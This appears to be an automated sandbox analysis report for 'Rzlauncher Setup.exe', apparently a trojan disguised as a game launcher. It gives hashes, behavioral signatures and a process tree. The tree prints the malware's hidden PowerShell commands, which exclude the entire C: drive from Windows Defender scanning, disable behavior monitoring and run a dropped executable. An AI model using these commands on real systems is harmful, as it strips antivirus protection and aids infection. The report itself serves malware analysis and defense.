Overview
overview
10Static
static
3Rzlauncher Setup.exe
windows7-x64
8Rzlauncher Setup.exe
windows10-2004-x64
10jre/Welcome.html
windows7-x64
3jre/Welcome.html
windows10-2004-x64
3jre/bin/JA...32.dll
windows7-x64
3jre/bin/JA...32.dll
windows10-2004-x64
3jre/bin/JA...ge.dll
windows7-x64
3jre/bin/JA...ge.dll
windows10-2004-x64
3jre/bin/Ja...32.dll
windows7-x64
3jre/bin/Ja...32.dll
windows10-2004-x64
3jre/bin/Ja...ge.dll
windows7-x64
3jre/bin/Ja...ge.dll
windows10-2004-x64
3jre/bin/Wi...32.dll
windows7-x64
3jre/bin/Wi...32.dll
windows10-2004-x64
3jre/bin/Wi...ge.dll
windows7-x64
3jre/bin/Wi...ge.dll
windows10-2004-x64
3jre/bin/awt.dll
windows7-x64
3jre/bin/awt.dll
windows10-2004-x64
3jre/bin/bci.dll
windows7-x64
3jre/bin/bci.dll
windows10-2004-x64
3jre/bin/cl...vm.dll
windows7-x64
3jre/bin/cl...vm.dll
windows10-2004-x64
3jre/bin/dcpr.dll
windows7-x64
3jre/bin/dcpr.dll
windows10-2004-x64
3jre/bin/de...se.dll
windows7-x64
3jre/bin/de...se.dll
windows10-2004-x64
3jre/bin/deploy.dll
windows7-x64
3jre/bin/deploy.dll
windows10-2004-x64
3jre/bin/dt_shmem.dll
windows7-x64
3jre/bin/dt_shmem.dll
windows10-2004-x64
3jre/bin/dt_socket.dll
windows7-x64
3jre/bin/dt_socket.dll
windows10-2004-x64
3Analysis
-
max time kernel
117s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
25-10-2024 13:30
Static task
static1
Behavioral task
behavioral1
Sample
Rzlauncher Setup.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
Rzlauncher Setup.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
jre/Welcome.html
Resource
win7-20241010-en
Behavioral task
behavioral4
Sample
jre/Welcome.html
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
jre/bin/JAWTAccessBridge-32.dll
Resource
win7-20241010-en
Behavioral task
behavioral6
Sample
jre/bin/JAWTAccessBridge-32.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
jre/bin/JAWTAccessBridge.dll
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
jre/bin/JAWTAccessBridge.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral9
Sample
jre/bin/JavaAccessBridge-32.dll
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
jre/bin/JavaAccessBridge-32.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral11
Sample
jre/bin/JavaAccessBridge.dll
Resource
win7-20240903-en
Behavioral task
behavioral12
Sample
jre/bin/JavaAccessBridge.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral13
Sample
jre/bin/WindowsAccessBridge-32.dll
Resource
win7-20240903-en
Behavioral task
behavioral14
Sample
jre/bin/WindowsAccessBridge-32.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral15
Sample
jre/bin/WindowsAccessBridge.dll
Resource
win7-20240903-en
Behavioral task
behavioral16
Sample
jre/bin/WindowsAccessBridge.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral17
Sample
jre/bin/awt.dll
Resource
win7-20240708-en
Behavioral task
behavioral18
Sample
jre/bin/awt.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral19
Sample
jre/bin/bci.dll
Resource
win7-20240903-en
Behavioral task
behavioral20
Sample
jre/bin/bci.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral21
Sample
jre/bin/client/jvm.dll
Resource
win7-20241010-en
Behavioral task
behavioral22
Sample
jre/bin/client/jvm.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral23
Sample
jre/bin/dcpr.dll
Resource
win7-20240729-en
Behavioral task
behavioral24
Sample
jre/bin/dcpr.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral25
Sample
jre/bin/decora_sse.dll
Resource
win7-20240903-en
Behavioral task
behavioral26
Sample
jre/bin/decora_sse.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral27
Sample
jre/bin/deploy.dll
Resource
win7-20240903-en
Behavioral task
behavioral28
Sample
jre/bin/deploy.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral29
Sample
jre/bin/dt_shmem.dll
Resource
win7-20241010-en
Behavioral task
behavioral30
Sample
jre/bin/dt_shmem.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral31
Sample
jre/bin/dt_socket.dll
Resource
win7-20240903-en
Behavioral task
behavioral32
Sample
jre/bin/dt_socket.dll
Resource
win10v2004-20241007-en
General
-
Target
Rzlauncher Setup.exe
-
Size
32KB
-
MD5
c919047959690a1646e561e81d45e5fd
-
SHA1
5bd528b9f0ec25ea19f0d0bbba41f4422597a488
-
SHA256
a9f0a76d6e73189b7385b6fcddeccb50e67b65c315b5c20108f86f22fce17802
-
SHA512
dee29e35b748bb69d0acc56d744eebd50cd462a93178072f9585dadd0c12b93907d7572832733ed0ba255909ae665a8cb102a360acfe3729365ea123480c3fca
-
SSDEEP
384:loI1gYZw33FUWUcC6TBhdsDgZH4o5NEvdlcn0ScPmPn0Avsl9EPg/s4Xsn+KvHKj:J7Zw33FNUf6Nhd/fQ1l+0vM0iT9
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell and hide display window.
Processes:
Powershell.exePowershell.exepowershell.exepowershell.exepid Process 2208 Powershell.exe 3028 Powershell.exe 2208 Powershell.exe 1564 powershell.exe 2980 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
Processes:
MTE1OTA1NmFlYTBjM2FhY2IyOGMxYzVmMGNmY2I3Mzg.exepid Process 2560 MTE1OTA1NmFlYTBjM2FhY2IyOGMxYzVmMGNmY2I3Mzg.exe -
Loads dropped DLL 1 IoCs
Processes:
MTE1OTA1NmFlYTBjM2FhY2IyOGMxYzVmMGNmY2I3Mzg.exepid Process 2560 MTE1OTA1NmFlYTBjM2FhY2IyOGMxYzVmMGNmY2I3Mzg.exe -
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
explorer.exeMTE1OTA1NmFlYTBjM2FhY2IyOGMxYzVmMGNmY2I3Mzg.exeRzlauncher Setup.exejavaw.exePowershell.exePowershell.exepowershell.exepowershell.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MTE1OTA1NmFlYTBjM2FhY2IyOGMxYzVmMGNmY2I3Mzg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rzlauncher Setup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language javaw.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
Powershell.exePowershell.exepowershell.exepowershell.exepid Process 3028 Powershell.exe 2208 Powershell.exe 3028 Powershell.exe 3028 Powershell.exe 2208 Powershell.exe 2208 Powershell.exe 1564 powershell.exe 2980 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
Powershell.exePowershell.exepowershell.exepowershell.exedescription pid Process Token: SeDebugPrivilege 3028 Powershell.exe Token: SeDebugPrivilege 2208 Powershell.exe Token: SeDebugPrivilege 1564 powershell.exe Token: SeDebugPrivilege 2980 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
javaw.exepid Process 2588 javaw.exe 2588 javaw.exe -
Suspicious use of WriteProcessMemory 46 IoCs
Processes:
Rzlauncher Setup.exejavaw.exePowershell.exePowershell.exeexplorer.exedescription pid Process procid_target PID 2668 wrote to memory of 2588 2668 Rzlauncher Setup.exe 30 PID 2668 wrote to memory of 2588 2668 Rzlauncher Setup.exe 30 PID 2668 wrote to memory of 2588 2668 Rzlauncher Setup.exe 30 PID 2668 wrote to memory of 2588 2668 Rzlauncher Setup.exe 30 PID 2668 wrote to memory of 2588 2668 Rzlauncher Setup.exe 30 PID 2668 wrote to memory of 2588 2668 Rzlauncher Setup.exe 30 PID 2668 wrote to memory of 2588 2668 Rzlauncher Setup.exe 30 PID 2588 wrote to memory of 2208 2588 javaw.exe 32 PID 2588 wrote to memory of 2208 2588 javaw.exe 32 PID 2588 wrote to memory of 2208 2588 javaw.exe 32 PID 2588 wrote to memory of 2208 2588 javaw.exe 32 PID 2588 wrote to memory of 2208 2588 javaw.exe 32 PID 2588 wrote to memory of 2208 2588 javaw.exe 32 PID 2588 wrote to memory of 2208 2588 javaw.exe 32 PID 2588 wrote to memory of 3028 2588 javaw.exe 33 PID 2588 wrote to memory of 3028 2588 javaw.exe 33 PID 2588 wrote to memory of 3028 2588 javaw.exe 33 PID 2588 wrote to memory of 3028 2588 javaw.exe 33 PID 2588 wrote to memory of 3028 2588 javaw.exe 33 PID 2588 wrote to memory of 3028 2588 javaw.exe 33 PID 2588 wrote to memory of 3028 2588 javaw.exe 33 PID 3028 wrote to memory of 2980 3028 Powershell.exe 36 PID 3028 wrote to memory of 2980 3028 Powershell.exe 36 PID 3028 wrote to memory of 2980 3028 Powershell.exe 36 PID 3028 wrote to memory of 2980 3028 Powershell.exe 36 PID 3028 wrote to memory of 2980 3028 Powershell.exe 36 PID 3028 wrote to memory of 2980 3028 Powershell.exe 36 PID 3028 wrote to memory of 2980 3028 Powershell.exe 36 PID 2208 wrote to memory of 1564 2208 Powershell.exe 37 PID 2208 wrote to memory of 1564 2208 Powershell.exe 37 PID 2208 wrote to memory of 1564 2208 Powershell.exe 37 PID 2208 wrote to memory of 1564 2208 Powershell.exe 37 PID 2208 wrote to memory of 1564 2208 Powershell.exe 37 PID 2208 wrote to memory of 1564 2208 Powershell.exe 37 PID 2208 wrote to memory of 1564 2208 Powershell.exe 37 PID 2588 wrote to memory of 2012 2588 javaw.exe 40 PID 2588 wrote to memory of 2012 2588 javaw.exe 40 PID 2588 wrote to memory of 2012 2588 javaw.exe 40 PID 2588 wrote to memory of 2012 2588 javaw.exe 40 PID 2588 wrote to memory of 2012 2588 javaw.exe 40 PID 2588 wrote to memory of 2012 2588 javaw.exe 40 PID 2588 wrote to memory of 2012 2588 javaw.exe 40 PID 1084 wrote to memory of 2560 1084 explorer.exe 42 PID 1084 wrote to memory of 2560 1084 explorer.exe 42 PID 1084 wrote to memory of 2560 1084 explorer.exe 42 PID 1084 wrote to memory of 2560 1084 explorer.exe 42
Processes
-
C:\Users\Admin\AppData\Local\Temp\Rzlauncher Setup.exe"C:\Users\Admin\AppData\Local\Temp\Rzlauncher Setup.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2668 -
C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe"C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "lib\.;lib\..;lib\activation.jar;lib\asm-all.jar;lib\commons-email.jar;lib\cs2 skin.mp4;lib\dn-compiled-module.jar;lib\dn-php-sdk.jar;lib\gson.jar;lib\jfoenix.jar;lib\jkeymaster.jar;lib\jna.jar;lib\jphp-app-framework.jar;lib\jphp-core.jar;lib\jphp-desktop-ext.jar;lib\jphp-desktop-hotkey-ext.jar;lib\jphp-gui-ext.jar;lib\jphp-gui-jfoenix-ext.jar;lib\jphp-json-ext.jar;lib\jphp-jsoup-ext.jar;lib\jphp-mail-ext.jar;lib\jphp-runtime.jar;lib\jphp-systemtray-ext.jar;lib\jphp-xml-ext.jar;lib\jphp-zend-ext.jar;lib\jphp-zip-ext.jar;lib\jsoup.jar;lib\mail.jar;lib\slf4j-api.jar;lib\slf4j-simple.jar;lib\zenless zero.mp4;lib\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2588 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exePowershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command "Add-MpPreference -Force -ExclusionPath "C:\""' -Verb RunAs}"3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2208 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -Force -ExclusionPath C:"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1564
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exePowershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command "Set-MpPreference -Force -DisableBehaviorMonitoring "' -Verb RunAs}"3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3028 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableBehaviorMonitoring4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2980
-
-
-
C:\Windows\SysWOW64\explorer.exeexplorer C:\Users\Admin\AppData\Local\Temp\MTE1OTA1NmFlYTBjM2FhY2IyOGMxYzVmMGNmY2I3Mzg.exe3⤵
- System Location Discovery: System Language Discovery
PID:2012
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Suspicious use of WriteProcessMemory
PID:1084 -
C:\Users\Admin\AppData\Local\Temp\MTE1OTA1NmFlYTBjM2FhY2IyOGMxYzVmMGNmY2I3Mzg.exe"C:\Users\Admin\AppData\Local\Temp\MTE1OTA1NmFlYTBjM2FhY2IyOGMxYzVmMGNmY2I3Mzg.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2560
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
226KB
MD51c83b86ee49577920f79e0175f56a480
SHA11ac4ef5a1f9ca34ac229bc26cdc914e38173c554
SHA25672a88efeda156c7304c5c8bd090dcb011ba3dfbbe91f5511969ba8eecee32843
SHA512d4b4ec415e92617548e863422f653b97460be182205871bf7526fe872d110e8ac17b60472d8351bed62e20ee584424816eeafcafe69ce096596ee044e1df022d
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5819e057d32762ba9ee9e2967fc7a1bf2
SHA1354689a60bcbc1153a020ef64ef98268e46cd72a
SHA25611436c7329203f250a8dbb2d822042ea603f95597adaf64cdb2291b0618cc027
SHA512410fb2daec8d43269b40fd0e0f2a5faa996906f74fbb48291f311337b251d67188f9c7969122bb9918c44884b28f7f36cff5e056603d12dd8fbe9716b3d14875
-
Filesize
351KB
MD5a7e9d0bb0687ba84a60b387a2a6fa8d9
SHA1d224cf061e302d82059ff9100f40b86b0cbbbc31
SHA2567704fea9664704d6cf2aa277e30f58c71b8a5f50c957d519896450a4f81e3dbe
SHA512185f52af9930a03dbccd3c160e4f6d3eedacf72999933b44c36268e45d233b617c36190c05d63211a9d0e99d448d03e5c927fcc2700d6b5244c987cfe33def88